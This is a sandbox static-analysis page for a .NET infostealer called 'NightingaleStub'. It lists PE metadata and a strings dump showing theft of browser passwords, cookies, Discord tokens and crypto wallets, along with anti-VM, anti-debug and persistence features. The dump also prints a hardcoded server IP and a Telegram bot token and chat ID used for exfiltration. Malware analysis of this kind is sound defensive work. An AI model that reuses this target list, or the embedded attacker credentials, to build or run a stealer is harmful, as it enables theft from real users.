popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2024-04-11 15:48:33

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00023594 0x00023600 5.77999409109
.rsrc 0x00026000 0x0000057e 0x00000600 3.9766600029
.reloc 0x00028000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000260a0 0x000002f4 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x00026394 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
moom825
V0; )UU
-#+6rm
% r9d
%"rKd
%$rgd
%&r}d
%2re
KDBM(
Y_c
Y_c
\/or
v4.0.30319
#Strings
" \ z
"*"="C"_"
#$#6#V#x#
#^$j$z$
$,%*&9&I&
(9(B(N(n(
#2%H%Z%
''.'E'g'
__StaticArrayInitTypeSize=10
<Main>b__10
<ReceiveAsync>d__10
<Finalize>d__10
<Disconnect>d__10
<SendCurrentWindow>d__10
<>9__0_0
<GetInheritedClasses>b__0_0
<>c__DisplayClass0_0
<>9__1_0
<Nightingale>b__1_0
<>c__DisplayClass1_0
<>9__2_0
<Collect>b__2_0
<>c__DisplayClass2_0
<Collect>g__AddFile|2_0
<>9__13_0
<Concat>b__13_0
<>c__DisplayClass3_0
<>c__DisplayClass14_0
<>9__4_0
<Main>b__4_0
<ParseDiscordTokens>b__4_0
<>c__DisplayClass4_0
<>c__DisplayClass5_0
<>9__6_0
<Concat>b__6_0
<>c__DisplayClass6_0
<>c__DisplayClass7_0
<>c__DisplayClass8_0
<>9__9_0
<GetWindowsVersion>b__9_0
<>9__0
<D>b__0
<IsVM>b__0
<IsCIS>b__0
<Send>b__0
<Key3Database>b__0
<ParseDatabase>b__0
<Create>b__0
<SanitizePath>b__0
<RemoveStartup>b__0
<ParsePasswords>b__0
<ListenForMessages>b__0
<ParseExtensions>b__0
<KillDebuggers>b__0
<ParseColdWallets>b__0
<ParseDatWallets>b__0
<Collect>b__0
<ParseMasterKey>b__0
string_0
get_<>h__TransparentIdentifier0
D38F1F4A152CEB94D7366FB851BD64D0C557CD57A0486E57BFB5926A910D5111
<>9__4_11
<Main>b__4_11
<ConnectSubSockAsync>d__11
8688D249E9D047B4FC2FB89CE05AFE9EC89252FFCCDD969DE6EEF260DD7FFB21
HMACSHA1
F9CD20F9BE4EBA8920C22293BAF9687E83B65C0DD5D44641A905FC535BC053B1
COMPRESSION_FORMAT_LZNT1
<>9__0_1
<GetInheritedClasses>b__0_1
<KillDebuggers>b__0_1
<>c__DisplayClass0_1
<>9__2_1
<Collect>b__2_1
<>c__DisplayClass2_1
<>9__4_1
<Main>b__4_1
<ParseDiscordTokens>b__4_1
<>c__DisplayClass4_1
<>9__5_1
<Key3Database>b__5_1
<>c__DisplayClass6_1
<>9__1
<IsVM>b__1
<Collect>b__1
<>u__1
<>c__0`1
Func`1
IEnumerable`1
Predicate`1
Task`1
Action`1
AsyncTaskMethodBuilder`1
EqualityComparer`1
TaskAwaiter`1
IEnumerator`1
HashSet`1
ArraySegment`1
List`1
boolValue1
<>7__wrap1
get_<>h__TransparentIdentifier1
CS$<>8__locals1
__StaticArrayInitTypeSize=12
<>9__4_12
<Main>b__4_12
<ConnectAndSetupAsync>d__12
__StaticArrayInitTypeSize=32
Microsoft.Win32
UInt32
ToInt32
PBKDF2
<>9__2_2
<Collect>b__2_2
<>c__DisplayClass2_2
<>9__4_2
<Main>b__4_2
<ParseDiscordTokens>b__4_2
<>9__5_2
<Key3Database>b__5_2
<data>5__2
<getdll>5__2
<conn>5__2
<comp>5__2
<socket>5__2
<HearbeatReply>5__2
<>9__2
<Collect>b__2
<>u__2
<>f__AnonymousType0`2
<>f__AnonymousType1`2
<>f__AnonymousType2`2
Func`2
IGrouping`2
KeyValuePair`2
Dictionary`2
boolValue2
<>7__wrap2
<>h__TransparentIdentifier2
<>9__4_13
<Main>b__4_13
<ReceiveAsync>d__13
<Uninstall>d__13
<>9__2_3
<Collect>b__2_3
<>9__4_3
<ParseDiscordTokens>b__4_3
<>9__5_3
<Key3Database>b__5_3
<sub>5__3
<total>5__3
<HearbeatFail>5__3
<hasdll>5__3
<Main>b__3
<CreateSubSock>d__3
<DllNodeHandler>d__3
<>u__3
Func`3
boolValue3
<>9__14
<Main>b__14
<SendAsync>d__14
<RemoveStartup>d__14
1D1CC35EA61331C5A85D2A960611153E37A62DCD916269D6E3B5A0DAC2EF3824
UInt64
ToInt64
<>9__4_4
<Main>b__4_4
<>9__5_4
<Key3Database>b__5_4
<fail>5__4
<socket>5__4
<dataLeft>5__4
<ParseDiscordTokens>b__4
<Collect>b__4
<RecvAllAsync_ddos_unsafer>d__4
Func`4
boolValue4
<>7__wrap4
<>9__4_5
<Main>b__4_5
<>9__5_5
<Key3Database>b__5_5
<e>5__5
<startTimestamp>5__5
<Collect>b__5
<GetAndSendInfo>d__5
<RecvAllAsync_ddos_safer>d__5
<ASt>d__5
boolValue5
<>7__wrap5
HMACSHA256
__StaticArrayInitTypeSize=6
<>9__4_6
<Main>b__4_6
<>9__5_6
<Key3Database>b__5_6
<lastSendTime>5__6
<Type0Receive>d__6
boolValue6
<RunConnectionLoop>d__17
4644D25C296EA1EDD5CA2B89F2032ACB2831E8D6D2BB65F379E56AE3E993AD27
__StaticArrayInitTypeSize=7
<dllname>5__7
<>9__7
<Main>b__7
<Type1Receive>d__7
boolValue7
<AuthenticateAsync>d__18
get_UTF8
EncodeUTF8
<>9__4_8
<Main>b__4_8
<e>5__8
<setSetId>d__8
EncodeUtf8
BAAD10E40DF6B5D52A22FCCE498BBD641EBB2377BB7DA4FE04EE26F084647F69
7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9
<>9__4_9
<Main>b__4_9
<SendAsync>d__9
<Type2Receive>d__9
<Module>
<PrivateImplementationDetails>
BerkeleyDB
630DCD2966C4336691125448BBB25B4FF412A49C732DB2C8ABC1B8581BD710DD
BuildID
CCH_RM_MAX_SVC_NAME
CCH_RM_MAX_APP_NAME
FILETIME
RM_APP_TYPE
F18366628A466F286AC60A27D59CADD5FD347730C9D55E04CE70FFDA96CB236F
DELAYLG
get_ASCII
COMPRESSION_ENGINE_MAXIMUM
RM_PROCESS_INFO
System.IO
AntiCIS
RM_UNIQUE_PROCESS
GetCPU
get_IV
set_IV
value__
StaUpTa
FileZilla
get_Data
set_Data
CbData
cbData
pbData
decompressedData
fileData
_cbAuthData
_pbAuthData
CompressData
DecompressData
CryptUnprotectData
DecryptData
get_data
mscorlib
DataBlob
NightingaleStub
GetMac
DecryptByteDesCbc
DecryptStringDesCbc
System.Collections.Generic
SendAsync
AuthenticateAsync
ReceiveAsync
ConnectSubSockAsync
AddStreamAsync
FromAsync
ConnectAndSetupAsync
ConnectAsync
LocalAlloc
get_Id
get_CurrentManagedThreadId
<>l__initialThreadId
pszAlgId
TSSessionId
GetWindowThreadProcessId
childProcessId
dwProcessId
chatId
setSetId
GetProcessById
Thread
pnProcInfoNeeded
SHA1Managed
AesManaged
Opened
_isDisposed
Compressed
get_Connected
IsNetworkConnected
AwaitUnsafeOnCompleted
get_IsCompleted
get_encrypted
pReserved
ComputeVoid
NewGuid
GetHwid
<<>h__TransparentIdentifier0>i__Field
<<>h__TransparentIdentifier1>i__Field
<data>i__Field
<encrypted>i__Field
<file>i__Field
<match>i__Field
<Data>k__BackingField
<MasterPassword>k__BackingField
<Type>k__BackingField
<Path>k__BackingField
<Algorithm>k__BackingField
<Vector>k__BackingField
<MasterPass>k__BackingField
<Objects>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Salt>k__BackingField
<GlobalSalt>k__BackingField
<EntrySalt>k__BackingField
<Content>k__BackingField
<IterationCount>k__BackingField
<CipherText>k__BackingField
<Ciphertext>k__BackingField
<PartIv>k__BackingField
<Key>k__BackingField
RecordHeaderField
ReadToEnd
Append
RegistryValueKind
get_Second
set_Method
GetMethod
method
FormatCreditCard
WriteEndRecord
LogRecord
WriteCentralDirRecord
Discord
get_MasterPassword
masterPassword
FormatPassword
password
LetThereBe
NetworkInterface
Replace
IsNullOrWhiteSpace
IService
RmService
GetSenderService
service
CreateInstance
Sequence
_cbNonce
_pbNonce
source
GetHashCode
set_Mode
PaddingMode
chainingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
AddSubNode
subNode
MainNode
get_Unicode
get_BigEndianUnicode
LocalFree
DeleteSubKeyTree
ExtentMyRage
FromImage
_centralDirImage
ZipStorage
storage
get_Message
ReceiveEncryptedMessage
InputLanguage
language
AddRange
FormatCookie
EndInvoke
BeginInvoke
Nightingale
CrcTable
ReadTable
ReadMasterTable
get_Available
IEnumerable
IDisposable
writable
bRestartable
ToDouble
RuntimeFieldHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
pSessionHandle
dwSessionHandle
localStateFile
get_file
TakeWhile
IsInRole
WindowsBuiltInRole
RmConsole
hModule
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
procName
methodName
tableName
get_FileName
set_FileName
lpFileName
GetFileName
ParseProfileName
profileName
get_MachineName
dllName
get_FullName
ItemName
strAppName
get_UserName
GetBrowserName
browserName
get_ProcessName
strServiceShortName
GetCpuName
GetGpuName
AssemblyName
get_DirectoryName
NormalizedFilename
filename
Compname
Username
username
hostname
modTime
ToFileTime
DateTime
CreationTime
DateTimeToDosTime
AccessTime
ProcessStartTime
ModifyTime
AppendLine
WriteLine
Combine
IAsyncStateMachine
SetStateMachine
stateMachine
get_Type
set_Type
pszBlobType
ValueType
get_DriveType
SockType
SecurityProtocolType
ApplicationType
GetType
SocketType
set_ContentType
myType
ByteArrayCompare
System.Core
secure
get_Culture
get_InvariantCulture
get_CurrentCulture
culture
Capture
MethodBase
ReadOnlyCollectionBase
Key3Database
Key4Database
ParseDatabase
WebResponse
GetResponse
System.IDisposable.Dispose
toParse
TryParse
Reverse
BTruncate
Create
MulticastDelegate
Deflate
DebuggerBrowsableState
<>1__state
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
IteratorStateMachineAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
get_Minute
Compute
ReadByte
get_Value
NullableValue
DeleteValue
AntiCISstringValue
AntiDebugstringValue
TaskstringValue
AntiVmstringValue
ExclusionstringValue
StartupstringValue
TargetstringValue
ContainsValue
GetValue
SetValue
DecryptValue
NextValue
MutexValue
GetPropertyValue
set_Expect100Continue
RegistryHive
Type0Receive
Type1Receive
Type2Receive
HiddenCallResolve
add_AssemblyResolve
CurrentDomain_AssemblyResolve
Remove
system.exe
get_Size
CbSize
cbSize
CompressedSize
FinalUncompressedSize
RtlGetCompressionWorkSpaceSize
_pageSize
OriginalFileSize
GrabberFileSize
_sqlDataTypeSize
MaxAuthTagSize
get_HashSize
set_BlockSize
_blockSize
get_TotalSize
totalSize
pDestinationSize
pNeededBufferSize
CompressedBufferSize
UncompressedBufferSize
get_ReceiveBufferSize
Get32BitSize
set_KeySize
Deserialize
SuppressFinalize
original_size
Resize
SizeOf
IsSubclassOf
IndexOf
_cbTag
_pbTag
authTag
Config
get_Png
System.Threading
set_Padding
_dbEncoding
GetEncoding
DefaultEncoding
System.Drawing.Imaging
NightingaleStub.Encryption.Hashing
isListening
System.Runtime.Versioning
FromBase64String
DownloadString
ParseString
JsonString
ToString
GetString
OctetString
hexString
Substring
disposing
ForceDeflating
System.Drawing
ConvertToULong
set_ErrorDialog
AntiDebug
ForEach
get_match
ComputeHash
strToHash
GetHash
get_Path
set_Path
levelDbPath
dbPath
executablePath
SanitizePath
fullPath
GetFolderPath
classpath
get_Length
SourceBufferLength
DestinationBufferLength
SetLength
set_ContentLength
GetWindowTextLength
length
EndsWith
StartsWith
get_Month
GrabberDepth
currentDepth
maxDepth
AsyncCallback
callback
IsLoopback
performCheck
CountryLock
CreateSubSock
FlushFinalBlock
TransformFinalBlock
get_CanSeek
NightingaleStub.DataWork
ParaMask
get_Task
ExecuteTask
AllocHGlobal
FreeHGlobal
RmCritical
RtlSetProcessIsCritical
Marshal
System.Security.Principal
WindowsPrincipal
System.ComponentModel
SendPanel
NightingalePanel
PriorityLevel
Uninstall
kernel32.dll
shell32.dll
user32.dll
ntdll.dll
rstrtmgr.dll
msvcrt.dll
FormatAutofill
MakeProcUnkill
System.Xml
set_SecurityProtocol
AntiVm
GetUsedRam
GetTotalRam
AddStream
_zipFileStream
get_BaseStream
DeflateStream
NetworkStream
CryptoStream
GetStream
GetRequestStream
MemoryStream
stream
Telegram
Program
AesGcm
get_Item
set_Item
get_Is64BitOperatingSystem
system
get_Algorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
ICryptoTransform
RootNum
rowNum
Medium
Chromium
Boolean
IsLittleEndian
littleEndian
TimeSpan
CopyFromScreen
_leaveOpen
IsConnectionOpen
AppDomain
get_CurrentDomain
get_PrefixOrigin
IsUserAnAdmin
IsAdmin
get_CurrentRegion
GetFileNameWithoutExtension
get_OSVersion
DwInfoVersion
browserVersion
GetWindowsVersion
RmEndSession
RmStartSession
System.IO.Compression
Exclusion
Application
get_Location
profileLocation
rootLocation
location
System.Net.NetworkInformation
GetGeoInformation
UnicastIPAddressInformation
pszImplementation
System.Globalization
System.Xml.Serialization
Action
op_Subtraction
System.Reflection
InputLanguageCollection
MatchCollection
UnicastIPAddressInformationCollection
ManagementObjectCollection
VHDConnection
WaitForNetworkConnection
get_Position
set_Position
Win32Exception
add_UnhandledException
NotSupportedException
DirectoryNotFoundException
PingException
PathTooLongException
ArgumentNullException
InvalidOperationException
UnauthorizedAccessException
SetException
SocketException
ArgumentException
pszDescription
NightingaleStub.Encryption
StringComparison
searchPattern
pattern
Unknown
CopyTo
CreateExtraInfo
pnProcInfo
GetAndSendInfo
MethodInfo
BcryptAuthenticatedCipherModeInfo
FileInfo
fileInfo
CultureInfo
DriveInfo
pPaddingInfo
FileSystemInfo
RegionInfo
get_StartInfo
set_StartInfo
ProcessStartInfo
DirectoryInfo
ServerIp
Bitmap
FilenameInZip
filenameInZip
memcmp
RunConnectionLoop
hwndApp
RmUnknownApp
RemoveStartup
System.Linq
<<>h__TransparentIdentifier0>j__TPar
<<>h__TransparentIdentifier1>j__TPar
<data>j__TPar
<encrypted>j__TPar
<file>j__TPar
<match>j__TPar
get_Year
Asn1Der
FileGrabber
number
ParseHeader
WriteLocalHeader
SQLiteReader
XmlReader
StreamReader
TextReader
BinaryReader
header
reader
ImportHider
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RSACryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
provider
AsyncVoidMethodBuilder
AsyncTaskMethodBuilder
StringBuilder
<>t__builder
SpecialFolder
placeholder
ISender
sender
RecvAllAsync_ddos_safer
RecvAllAsync_ddos_unsafer
CompressedBuffer
UncompressedBuffer
WorkspaceBuffer
SourceBuffer
DestinationBuffer
RtlCompressBuffer
RtlDecompressBuffer
buffer
FileManager
ServicePointManager
Integer
Debugger
ManagementObjectSearcher
bCipher
ObjectIdentifier
DllNodeHandler
lineHandler
DllHandler
SocketHandler
ResolveEventHandler
UnhandledExceptionEventHandler
_dllhandler
LockHelper
ToUpper
RmExplorer
CurrentUser
JsonParser
IBrowser
TaskAwaiter
GetAwaiter
StreamWriter
TextWriter
BinaryWriter
GetDelegateForFunctionPointer
PerformanceCounter
GoodsCounter
BitConverter
RuntimeResolver
subServer
ToLower
XmlSerializer
GetLastWin32Error
IEnumerator
ManagementObjectEnumerator
System.Collections.Generic.IEnumerable<NightingaleStub.Functions.LogRecord>.GetEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
get_Vector
set_Vector
CreateDecryptor
CreateEncryptor
IntPtr
get_Hour
GetGPUs
Graphics
System.Diagnostics
FromSeconds
get_TotalMilliseconds
NightingaleStub.FoundGoods
TGgoods
AddRecords
records
ParsePasswords
TripleDes
GetAllNetworkInterfaces
nServices
System.Runtime.InteropServices
System.Runtime.CompilerServices
RmRegisterResources
DebuggingModes
subNodes
ListenForMessages
get_InstalledInputLanguages
Matches
Assemblies
GetDirectories
_masterTableEntries
_tableEntries
GetIPProperties
IPInterfaceProperties
EnumerateFiles
_existingFiles
nFiles
GetFiles
_files
ListProfiles
profiles
NumberStyles
_fieldNames
rgsServiceNames
GetValueNames
rgsFilenames
System.Runtime.InteropServices.ComTypes
GetTypes
expires
GetInheritedClasses
GetLockingProcesses
GetProcesses
get_UnicastAddresses
FromMinutes
_fileBytes
ReadAllBytes
IntToBytes
HexToBytes
_bufferBytes
GetAddressBytes
GetBytes
sizetdwBytes
values
GetDrives
UpdateCrcAndSizes
PasswordsTags
CookiesTags
BindingFlags
dwSessionFlags
SocketFlags
dwPromptFlags
uFlags
DwFlags
dwFlags
passwordstags
cookiestags
ResolveEventArgs
UnhandledExceptionEventArgs
AntThecis
<>4__this
NightingaleStub.Antis
get_Ticks
System.Threading.Tasks
Equals
System.Windows.Forms
ParseDiscordTokens
Contains
ParseExtensions
SocketTaskExtensions
System.Text.RegularExpressions
rgApplications
nApplications
iterations
System.Collections
NightingaleStub.Functions
StringSplitOptions
descriptions
lpdwRebootReasons
FilePatterns
GetDeviceCaps
rgAffectedApps
get_Chars
invalidChars
GetInvalidPathChars
KillDebuggers
debuggers
NightingaleStub.LogHandlers
RuntimeHelpers
BrowserHelpers
NightingaleStub.FoundGoods.Browsers
ListBrowsers
RSAParameters
ImportParameters
WaitForPendingFinalizers
get_MasterPass
masterPass
get_IsClass
FileAccess
_access
GetOwnerProcess
GetCurrentProcess
process
GetStaticIPAddress
get_Address
GetProcAddress
GetPhysicalAddress
ipAddress
attackerAddress
walletAddress
Compress
Decompress
get_Objects
System.Net.Sockets
ParseColdWallets
CryptoWallets
ParseDatWallets
set_Arguments
arguments
Exists
GetAntivirus
IPStatus
get_Status
get_OperationalStatus
AppStatus
arrays
get_Keys
Concat
AppendFormat
ImageFormat
CompressionFormat
get_IsAbstract
Extract
ManagementBaseObject
hObject
get_ExceptionObject
Asn1DerObject
ManagementObject
cbKeyObject
pbKeyObject
object
Select
Collect
Connect
EndDisconnect
_OnDisconnect
BeginDisconnect
Distinct
CryptprotectPromptstruct
System.Net
Socket
socket
wallet
System.Collections.IEnumerator.Reset
useOffset
ReadTableFromOffset
HeaderOffset
T_offset
get_Lenght
set_Lenght
set_DefaultConnectionLimit
WaitForExit
get_Salt
get_GlobalSalt
globalSalt
get_EntrySalt
entrySalt
get_Default
FirstOrDefault
pcbResult
IAsyncResult
DialogResult
GetResult
SetResult
result
GetBytesFromInt
BytesToInt
WebClient
TcpClient
client
System.Management
SqlStatement
Comment
_comment
Environment
Component
Parent
System.Collections.Generic.IEnumerator<NightingaleStub.Functions.LogRecord>.Current
System.Collections.IEnumerator.Current
System.Collections.Generic.IEnumerator<NightingaleStub.Functions.LogRecord>.get_Current
System.Collections.IEnumerator.get_Current
GetCurrent
<>2__current
get_Content
set_Content
get_RemoteEndPoint
get_Count
CreditCardCount
CookieCount
AutoFillCount
get_IterationCount
get_ProcessorCount
FilesCount
ExtensionsCount
WalletsCount
GetRowCount
Screenshot
GetPathRoot
browserRoot
pPrompt
szPrompt
BCrypt
XorDecrypt
BCryptDecrypt
XorEncrypt
ThreadStart
TrimStart
Convert
ServerPort
FailFast
HttpWebRequest
MakeFormRequest
DiscordList
PasswordList
ToList
RmGetList
set_Timeout
set_ReceiveTimeout
SetRecvTimeout
ResetRecvTimeout
socktimeout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
ReadAllText
pPlainText
get_CipherText
pCipherText
cipherText
GetWindowText
_cbMacContext
_pbMacContext
get_Ciphertext
ciphertext
get_PartIv
partIv
StartNew
RegistryView
get_Now
GetForegroundWindow
GetCaptionOfActiveWindow
RmMainWindow
set_CreateNoWindow
RmOtherWindow
SendCurrentWindow
Datenow
endIdx
startIdx
_bufferEndIndex
_blockIndex
nIndex
_bufferStartIndex
startIndex
prefix
MessageBox
GroupBy
get_Day
set_NoDelay
InitializeArray
ToArray
InfoArray
get_IsReady
get_Key
set_Key
CreateSubKey
OpenSubKey
publicKey
OpenBaseKey
GenerateKey
DeserializeKey
strSessionKey
_EncryptionKey
ParseMasterKey
masterKey
ContainsKey
hImportKey
BCryptImportKey
BCryptDestroyKey
OpenRegistryKey
System.Security.Cryptography
GetExecutingAssembly
GetAssembly
GetEntryAssembly
get_AddressFamily
httpOnly
PingReply
SelectMany
BlockCopy
pEntropy
GetSummary
MorseCodeDictionary
LoadLibrary
get_Factory
TaskFactory
get_SystemDirectory
currentDirectory
get_RootDirectory
directory
TableEntry
ZipFileEntry
SqliteMasterEntry
TargetCountry
Registry
op_Equality
op_Inequality
get_Priority
WindowsIdentity
BCryptGetProperty
BCryptSetProperty
pszProperty
(2(6($(
(D(8(@(
(+(9(9(
WrapNonExceptionThrows
Copyright
2023
$4F484650-2787-4FAC-A477-EC30FFAFCD5D
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
!NightingaleStub.Program+<ASt>d__5
,NightingaleStub.GoodsCounter+<Finalize>d__10
7NightingaleStub.LogHandlers.Handler+<CreateSubSock>d__3
8NightingaleStub.LogHandlers.Handler+<GetAndSendInfo>d__5
6NightingaleStub.LogHandlers.Handler+<Type0Receive>d__6
6NightingaleStub.LogHandlers.Handler+<Type1Receive>d__7
2NightingaleStub.LogHandlers.Handler+<setSetId>d__8
6NightingaleStub.LogHandlers.Handler+<Type2Receive>d__9
<NightingaleStub.LogHandlers.Handler+<SendCurrentWindow>d__10
2NightingaleStub.LogHandlers.Node+<Disconnect>d__10
;NightingaleStub.LogHandlers.Node+<ConnectSubSockAsync>d__11
4NightingaleStub.LogHandlers.Node+<ReceiveAsync>d__13
1NightingaleStub.LogHandlers.Node+<SendAsync>d__14
9NightingaleStub.LogHandlers.Node+<AuthenticateAsync>d__18
INightingaleStub.LogHandlers.SocketHandler+<RecvAllAsync_ddos_unsafer>d__4
GNightingaleStub.LogHandlers.SocketHandler+<RecvAllAsync_ddos_safer>d__5
9NightingaleStub.LogHandlers.SocketHandler+<SendAsync>d__9
=NightingaleStub.LogHandlers.SocketHandler+<ReceiveAsync>d__10
ENightingaleStub.LogHandlers.NightingalePanel+<RunConnectionLoop>d__17
8NightingaleStub.DataWork.DllHandler+<DllNodeHandler>d__3
:NightingaleStub.DataWork.Utils+<ConnectAndSetupAsync>d__12
/NightingaleStub.DataWork.Utils+<Uninstall>d__13
3NightingaleStub.DataWork.Utils+<RemoveStartup>d__14
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
BryS,>V
}i;yMBg;
F+xi7\
&rK<9#
5=JlPF&,K
S\/c=D
&W"B-.Q
h$Lh~bC
@Ta;Mi}
&(qjzAz
v>#8|^
\v\h=PBX
zxeoSoI
U=z{2H
_nl0rKX`r
+/*se7
FqznSv
BXDc^?
<Ph;4%bz
7<mcE:
)bkj6
*^>A(?
-<&-)`\
I>PIS1
LgI$b:
S.={"V{sP
!ds|d\
uF#.l}F=N+
ao(cg.A
7NR"BP
MQv'l`o
k^IrM\C
\Zb<YGm
23)9 <$
A.:><x
neKtzN
V/pJ}v
{IK:BM
[7{DkW
M2aEf0
DK~N6
qRpHL!\
$.'`|M<
m^,R *bd
t!/Ut1e
BeU4|0/
nED:VnA
l]=RR$
RAu@ox
&ab,eZ
5{g/t?
pA"/8>i
i2a%uR
:p_ &h
9s8z%W
*/VOf$
*aswlI
Washington1
Redmond1
Microsoft Corporation1.0,
%Microsoft Windows Production PCA 20110
220505192315Z
230504192315Z0p1
Washington1
Redmond1
Microsoft Corporation1
Microsoft Windows0
?/=KzdN
,pZuqk
#HMDuV
I0G1-0+
$Microsoft Ireland Operations Limited1
229879+4700220
Chttp://www.microsoft.com/pkiops/crl/MicWinProPCA2011_2011-10-19.crl0a
Ehttp://www.microsoft.com/pkiops/certs/MicWinProPCA2011_2011-10-19.crt0
m<&8cx
Washington1
Redmond1
Microsoft Corporation1200
)Microsoft Root Certificate Authority 20100
111019184142Z
261019185142Z0
Washington1
Redmond1
Microsoft Corporation1.0,
%Microsoft Windows Production PCA 20110
i%(\6
Ehttp://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z
>http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0
Washington1
Redmond1
Microsoft Corporation1.0,
%Microsoft Windows Production PCA 2011
,u1qEorzUH3qGrrPZjgl6H99WweaBuGeX6mk5Lft0iUg=0Z
http://www.microsoft.com/windows0
MMM\2n
20230106084620.986Z0
Washington1
Redmond1
Microsoft Corporation1-0+
$Microsoft Ireland Operations Limited1&0$
Thales TSS ESN:86DF-4BBC-93351%0#
Microsoft Time-Stamp Service
Washington1
Redmond1
Microsoft Corporation1&0$
Microsoft Time-Stamp PCA 20100
220920202214Z
231214202214Z0
Washington1
Redmond1
Microsoft Corporation1-0+
$Microsoft Ireland Operations Limited1&0$
Thales TSS ESN:86DF-4BBC-93351%0#
Microsoft Time-Stamp Service0
u>E?pd I`
Nhttp://www.microsoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl0l
Phttp://www.microsoft.com/pkiops/certs/Microsoft%20Time-Stamp%20PCA%202010(1).crt0
Washington1
Redmond1
Microsoft Corporation1200
)Microsoft Root Certificate Authority 20100
210930182225Z
300930183225Z0|1
Washington1
Redmond1
Microsoft Corporation1&0$
Microsoft Time-Stamp PCA 20100
3http://www.microsoft.com/pkiops/Docs/Repository.htm0
Ehttp://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z
>http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0
as.,k{n?,
Washington1
Redmond1
Microsoft Corporation1-0+
$Microsoft Ireland Operations Limited1&0$
Thales TSS ESN:86DF-4BBC-93351%0#
Microsoft Time-Stamp Service
Washington1
Redmond1
Microsoft Corporation1&0$
Microsoft Time-Stamp PCA 20100
20230106074918Z
20230107074918Z0t0:
Washington1
Redmond1
Microsoft Corporation1&0$
Microsoft Time-Stamp PCA 2010
Washington1
Redmond1
Microsoft Corporation1&0$
Microsoft Time-Stamp PCA 2010
K3b3o
(MD9E9F9G9H9I9J9L9M9N9O9P9S9T9V9W9]9`Mz9|9}9
%$&$'$*),+-+/.0.3242528797;:<:>=@?DCECFCGCHCICJCLKMKNKOKPKSRTRURVRWR[Z\Z]Z`_gfhfifjfkflfmfnfpoqorotszy|{}{~{
{{ file = {0}, data = {1} }}
{{ <>h__TransparentIdentifier0 = {0}, match = {1} }}
{{ <>h__TransparentIdentifier1 = {0}, encrypted = {1} }}
*-*-*-
--**--
**--**
**--@@
**__&&
*_+^^#
^&****
^^%%^^
^^%^%^^
(__|__)
(__()__)
-.-. *^** *^ *** *** * *** *_+^^# *_+^^# ^^ *** @~_* *** * ^ ^ ** ^* ^^* *** *_+^^# *_+^^# *** **** * *^** *^** *_+^^# *_+^^# ^^^ *^^* * ^* *_+^^# *_+^^# ^*^* ^^^ ^^ ^^ *^ ^* ^**
-.. * *^** * ^^* *^ ^ * . ^**^ * ^*^* **^ ^ *
Software\
^*^* ^^ ^** *-*-*- * ^**^ *
$*_+ ^*^* (__()__) *** ^ *^ *^* ^ (__()__) ^*^* ^^^ ^^ *^^* **^ ^ * *^* ^** * **^* *^ **^ *^** ^ *** *-*-*- * ^**^ *
Telegram
80.76.49.148
%GATE%
6813766312:AAGyxmK0E-SiPNsQCpjEIFZJIOhZnrPLxhw
6467170572
Invalid input
%TARGET%
Nightingale Client Tag
Nightigale
Build ID
Get Logs any 5 min (minutes only)
*seed*
*.mafile
Enter build mutex
Waiting for network connection...
Network connection established.
8.8.8.8
PingException occurred.
SocketException occurred.
An unexpected exception occurred.
Canada
France
England
Germany
Not connected to network. Waiting for network connection...
Exception occurred:
Unhandled exception fixed: {0}
getaddresses
Amount
TimeoutSecs
Password.txt
Messengers/Discord Tokens.txt
wallet.dat
Wallets/
Armory
Atomic
atomic\Local Storage\leveldb
Bytecoin
bytecoin
Coninomi
Coinomi\Coinomi\wallets
com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Electrum
Electrum\wallets
Exodus
Exodus\exodus.wallet
Guarda
Guarda\Local Storage\leveldb
Ethereum
Ethereum\keystore
Liquality
Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
